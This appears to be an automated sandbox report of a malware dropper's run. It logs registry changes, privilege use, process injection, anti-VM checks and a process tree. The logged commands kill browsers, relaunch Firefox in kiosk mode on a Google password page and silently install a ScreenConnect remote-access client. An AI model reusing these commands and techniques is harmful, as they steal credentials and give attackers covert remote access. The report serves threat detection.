\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList\Media msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings firefox.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\Version = "402849799" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-d24c72d59e97003e\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-395E-49A3771D6301}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (d24c72d59e97003e)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-395E-49A3771D6301}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\21E30449AE5579A5690D7E49BD63E090\Full msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\PackageCode = "21E30449AE5579A5690D7E49BD63E090" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-d24c72d59e97003e msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (d24c72d59e97003e)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-395E-49A3771D6301} msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\444AA45913384B0C2DC4275DE97900E3 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\d24c72d59e97003e\\" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-395E-49A3771D6301}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\d24c72d59e97003e\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\ProductName = "ScreenConnect Client (d24c72d59e97003e)" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\Assignment = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e\shell msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-395E-49A3771D6301}\ = "ScreenConnect Client (d24c72d59e97003e) Credential Provider" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\444AA45913384B0C2DC4275DE97900E3\21E30449AE5579A5690D7E49BD63E090 msiexec.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 4180 1K20A9.exe 4180 1K20A9.exe 2616 skotes.exe 2616 skotes.exe 2228 2z8437.exe 2228 2z8437.exe 1280 3s79Z.exe 1280 3s79Z.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 6068 155aa5ef5f.exe 6068 155aa5ef5f.exe 6652 1efbfbe0a1.exe 6652 1efbfbe0a1.exe 4068 msiexec.exe 4068 msiexec.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 2708 skotes.exe 2708 skotes.exe 6528 skotes.exe 6528 skotes.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4068 taskkill.exe Token: SeDebugPrivilege 1476 taskkill.exe Token: SeDebugPrivilege 4536 taskkill.exe Token: SeDebugPrivilege 4856 taskkill.exe Token: SeDebugPrivilege 776 taskkill.exe Token: SeDebugPrivilege 1916 zhark.exe Token: SeShutdownPrivilege 3448 msiexec.exe Token: SeIncreaseQuotaPrivilege 3448 msiexec.exe Token: SeSecurityPrivilege 4068 msiexec.exe Token: SeCreateTokenPrivilege 3448 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3448 msiexec.exe Token: SeLockMemoryPrivilege 3448 msiexec.exe Token: SeIncreaseQuotaPrivilege 3448 msiexec.exe Token: SeMachineAccountPrivilege 3448 msiexec.exe Token: SeTcbPrivilege 3448 msiexec.exe Token: SeSecurityPrivilege 3448 msiexec.exe Token: SeTakeOwnershipPrivilege 3448 msiexec.exe Token: SeLoadDriverPrivilege 3448 msiexec.exe Token: SeSystemProfilePrivilege 3448 msiexec.exe Token: SeSystemtimePrivilege 3448 msiexec.exe Token: SeProfSingleProcessPrivilege 3448 msiexec.exe Token: SeIncBasePriorityPrivilege 3448 msiexec.exe Token: SeCreatePagefilePrivilege 3448 msiexec.exe Token: SeCreatePermanentPrivilege 3448 msiexec.exe Token: SeBackupPrivilege 3448 msiexec.exe Token: SeRestorePrivilege 3448 msiexec.exe Token: SeShutdownPrivilege 3448 msiexec.exe Token: SeDebugPrivilege 3448 msiexec.exe Token: SeAuditPrivilege 3448 msiexec.exe Token: SeSystemEnvironmentPrivilege 3448 msiexec.exe Token: SeChangeNotifyPrivilege 3448 msiexec.exe Token: SeRemoteShutdownPrivilege 3448 msiexec.exe Token: SeUndockPrivilege 3448 msiexec.exe Token: SeSyncAgentPrivilege 3448 msiexec.exe Token: SeEnableDelegationPrivilege 3448 msiexec.exe Token: SeManageVolumePrivilege 3448 msiexec.exe Token: SeImpersonatePrivilege 3448 msiexec.exe Token: SeCreateGlobalPrivilege 3448 msiexec.exe Token: SeCreateTokenPrivilege 3448 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3448 msiexec.exe Token: SeLockMemoryPrivilege 3448 msiexec.exe Token: SeIncreaseQuotaPrivilege 3448 msiexec.exe Token: SeMachineAccountPrivilege 3448 msiexec.exe Token: SeTcbPrivilege 3448 msiexec.exe Token: SeSecurityPrivilege 3448 msiexec.exe Token: SeTakeOwnershipPrivilege 3448 msiexec.exe Token: SeLoadDriverPrivilege 3448 msiexec.exe Token: SeSystemProfilePrivilege 3448 msiexec.exe Token: SeSystemtimePrivilege 3448 msiexec.exe Token: SeProfSingleProcessPrivilege 3448 msiexec.exe Token: SeIncBasePriorityPrivilege 3448 msiexec.exe Token: SeCreatePagefilePrivilege 3448 msiexec.exe Token: SeCreatePermanentPrivilege 3448 msiexec.exe Token: SeBackupPrivilege 3448 msiexec.exe Token: SeRestorePrivilege 3448 msiexec.exe Token: SeShutdownPrivilege 3448 msiexec.exe Token: SeDebugPrivilege 3448 msiexec.exe Token: SeAuditPrivilege 3448 msiexec.exe Token: SeSystemEnvironmentPrivilege 3448 msiexec.exe Token: SeChangeNotifyPrivilege 3448 msiexec.exe Token: SeRemoteShutdownPrivilege 3448 msiexec.exe Token: SeUndockPrivilege 3448 msiexec.exe Token: SeSyncAgentPrivilege 3448 msiexec.exe Token: SeEnableDelegationPrivilege 3448 msiexec.exe -
Suspicious use of FindShellTrayWindow 40 IoCs
pid Process 4180 1K20A9.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 3448 msiexec.exe 5000 4T753l.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 5000 4T753l.exe 5000 4T753l.exe 3448 msiexec.exe 5624 ScreenConnect.WindowsClient.exe 5624 ScreenConnect.WindowsClient.exe 5624 ScreenConnect.WindowsClient.exe 5624 ScreenConnect.WindowsClient.exe 5624 ScreenConnect.WindowsClient.exe -
Suspicious use of SendNotifyMessage 36 IoCs
pid Process 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 5000 4T753l.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 1524 firefox.exe 5000 4T753l.exe 5000 4T753l.exe 5624 ScreenConnect.WindowsClient.exe 5624 ScreenConnect.WindowsClient.exe 5624 ScreenConnect.WindowsClient.exe 5624 ScreenConnect.WindowsClient.exe 5624 ScreenConnect.WindowsClient.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1524 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4040 wrote to memory of 1364 4040 d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe 86 PID 4040 wrote to memory of 1364 4040 d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe 86 PID 4040 wrote to memory of 1364 4040 d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe 86 PID 1364 wrote to memory of 3512 1364 k3a89.exe 89 PID 1364 wrote to memory of 3512 1364 k3a89.exe 89 PID 1364 wrote to memory of 3512 1364 k3a89.exe 89 PID 3512 wrote to memory of 4180 3512 l3v78.exe 90 PID 3512 wrote to memory of 4180 3512 l3v78.exe 90 PID 3512 wrote to memory of 4180 3512 l3v78.exe 90 PID 4180 wrote to memory of 2616 4180 1K20A9.exe 91 PID 4180 wrote to memory of 2616 4180 1K20A9.exe 91 PID 4180 wrote to memory of 2616 4180 1K20A9.exe 91 PID 3512 wrote to memory of 2228 3512 l3v78.exe 92 PID 3512 wrote to memory of 2228 3512 l3v78.exe 92 PID 3512 wrote to memory of 2228 3512 l3v78.exe 92 PID 1364 wrote to memory of 1280 1364 k3a89.exe 103 PID 1364 wrote to memory of 1280 1364 k3a89.exe 103 PID 1364 wrote to memory of 1280 1364 k3a89.exe 103 PID 4040 wrote to memory of 5000 4040 d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe 104 PID 4040 wrote to memory of 5000 4040 d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe 104 PID 4040 wrote to memory of 5000 4040 d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe 104 PID 5000 wrote to memory of 4068 5000 4T753l.exe 105 PID 5000 wrote to memory of 4068 5000 4T753l.exe 105 PID 5000 wrote to memory of 4068 5000 4T753l.exe 105 PID 5000 wrote to memory of 1476 5000 4T753l.exe 109 PID 5000 wrote to memory of 1476 5000 4T753l.exe 109 PID 5000 wrote to memory of 1476 5000 4T753l.exe 109 PID 5000 wrote to memory of 4536 5000 4T753l.exe 111 PID 5000 wrote to memory of 4536 5000 4T753l.exe 111 PID 5000 wrote to memory of 4536 5000 4T753l.exe 111 PID 5000 wrote to memory of 4856 5000 4T753l.exe 113 PID 5000 wrote to memory of 4856 5000 4T753l.exe 113 PID 5000 wrote to memory of 4856 5000 4T753l.exe 113 PID 5000 wrote to memory of 776 5000 4T753l.exe 115 PID 5000 wrote to memory of 776 5000 4T753l.exe 115 PID 5000 wrote to memory of 776 5000 4T753l.exe 115 PID 5000 wrote to memory of 512 5000 4T753l.exe 120 PID 5000 wrote to memory of 512 5000 4T753l.exe 120 PID 512 wrote to memory of 1524 512 firefox.exe 121 PID 512 wrote to memory of 1524 512 firefox.exe 121 PID 512 wrote to memory of 1524 512 firefox.exe 121 PID 512 wrote to memory of 1524 512 firefox.exe 121 PID 512 wrote to memory of 1524 512 firefox.exe 121 PID 512 wrote to memory of 1524 512 firefox.exe 121 PID 512 wrote to memory of 1524 512 firefox.exe 121 PID 512 wrote to memory of 1524 512 firefox.exe 121 PID 512 wrote to memory of 1524 512 firefox.exe 121 PID 512 wrote to memory of 1524 512 firefox.exe 121 PID 512 wrote to memory of 1524 512 firefox.exe 121 PID 2616 wrote to memory of 1916 2616 skotes.exe 122 PID 2616 wrote to memory of 1916 2616 skotes.exe 122 PID 2616 wrote to memory of 1916 2616 skotes.exe 122 PID 1524 wrote to memory of 2004 1524 firefox.exe 123 PID 1524 wrote to memory of 2004 1524 firefox.exe 123 PID 1524 wrote to memory of 2004 1524 firefox.exe 123 PID 1524 wrote to memory of 2004 1524 firefox.exe 123 PID 1524 wrote to memory of 2004 1524 firefox.exe 123 PID 1524 wrote to memory of 2004 1524 firefox.exe 123 PID 1524 wrote to memory of 2004 1524 firefox.exe 123 PID 1524 wrote to memory of 2004 1524 firefox.exe 123 PID 1524 wrote to memory of 2004 1524 firefox.exe 123 PID 1524 wrote to memory of 2004 1524 firefox.exe 123 PID 1524 wrote to memory of 2004 1524 firefox.exe 123 PID 1524 wrote to memory of 2004 1524 firefox.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe"C:\Users\Admin\AppData\Local\Temp\d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\k3a89.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\k3a89.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\l3v78.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\l3v78.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1K20A9.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1K20A9.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Users\Admin\AppData\Local\Temp\1004454001\zhark.exe"C:\Users\Admin\AppData\Local\Temp\1004454001\zhark.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1916 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\d24c72d59e97003e\ScreenConnect.ClientSetup.msi"7⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3448
-
-
-
C:\Users\Admin\AppData\Local\Temp\1004459001\155aa5ef5f.exe"C:\Users\Admin\AppData\Local\Temp\1004459001\155aa5ef5f.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 15807⤵
- Program crash
PID:6516
-
-
-
C:\Users\Admin\AppData\Local\Temp\1004460001\1efbfbe0a1.exe"C:\Users\Admin\AppData\Local\Temp\1004460001\1efbfbe0a1.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6652
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"6⤵PID:4872
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2z8437.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2z8437.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2228 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 15965⤵
- Program crash
PID:3000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 15605⤵
- Program crash
PID:824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3s79Z.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3s79Z.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1280
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4T753l.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4T753l.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking3⤵
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking4⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2012 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b77de24-d33a-40c2-82ec-917f74c4324b} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" gpu5⤵PID:2004
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2488 -parentBuildID 20240401114208 -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {be0f1a05-b263-450d-8841-67ceef0269e4} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" socket5⤵PID:4904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 1 -isForBrowser -prefsHandle 3260 -prefMapHandle 3120 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb641dc6-a8ec-4210-ba20-2e48fa232a83} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab5⤵PID:2524
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4032 -childID 2 -isForBrowser -prefsHandle 3992 -prefMapHandle 4024 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a44a9c27-ebca-4945-9e46-4bbe5895bd33} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab5⤵PID:3768
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4664 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4648 -prefMapHandle 4644 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b71c063d-503d-4d6f-9dc5-b8f94127b5ff} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" utility5⤵
- Checks processor information in registry
PID:4324
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5364 -prefMapHandle 5356 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82748f5c-d07b-4945-8a2b-bc94a7c56175} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab5⤵PID:5544
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 4 -isForBrowser -prefsHandle 5588 -prefMapHandle 5584 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {45596daf-3f2c-48c8-acd8-6ea8f58bd382} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab5⤵PID:5556
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5380 -childID 5 -isForBrowser -prefsHandle 5780 -prefMapHandle 5776 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd6d0937-0f0b-42ef-93bc-df27b18c8233} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab5⤵PID:5600
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2228 -ip 22281⤵PID:3868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2228 -ip 22281⤵PID:3624
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4068 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 501C38EF6B291425D6859961753099A0 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4592 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI3246.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240661921 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:7152
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:624
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7CFBEE859CA79996410C342D7BC32AF02⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1664
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 414DA11BFEF912AFF013CA3881CCDF84 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5232
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:5856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 6068 -ip 60681⤵PID:6484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6068 -ip 60681⤵PID:3304
-
